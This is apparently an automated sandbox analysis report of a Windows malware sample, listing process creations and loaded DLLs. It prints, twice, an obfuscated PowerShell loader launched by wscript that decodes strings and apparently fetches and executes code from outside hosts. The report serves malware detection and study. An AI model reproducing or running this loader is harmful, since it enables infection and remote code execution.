';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1512989035.000002CDAA82B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Un.pdb[(r source: powershell.exe, 00000004.00000002.1400620214.000001D466690000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pdblib.pdb source: powershell.exe, 00000001.00000002.1582637126.000002CDC2CFB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.1512989035.000002CDAA800000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000008.00000002.2678462798.000001336A368000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.2678462798.000001336A356000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2675286463.000001336A183000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1399165537.000001D466470000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2675286463.000001336A183000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32? source: powershell.exe, 00000004.00000002.1399165537.000001D466470000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbL. source: powershell.exe, 00000008.00000002.2678462798.000001336A368000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbD source: powershell.exe, 00000004.00000002.1402547814.000001D4667F8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbe35 source: powershell.exe, 00000001.00000002.1582637126.000002CDC2CC2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 00000008.00000002.2678462798.000001336A356000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbM source: powershell.exe, 00000008.00000002.2680246932.000001336A3E0000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Obfuscated command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm 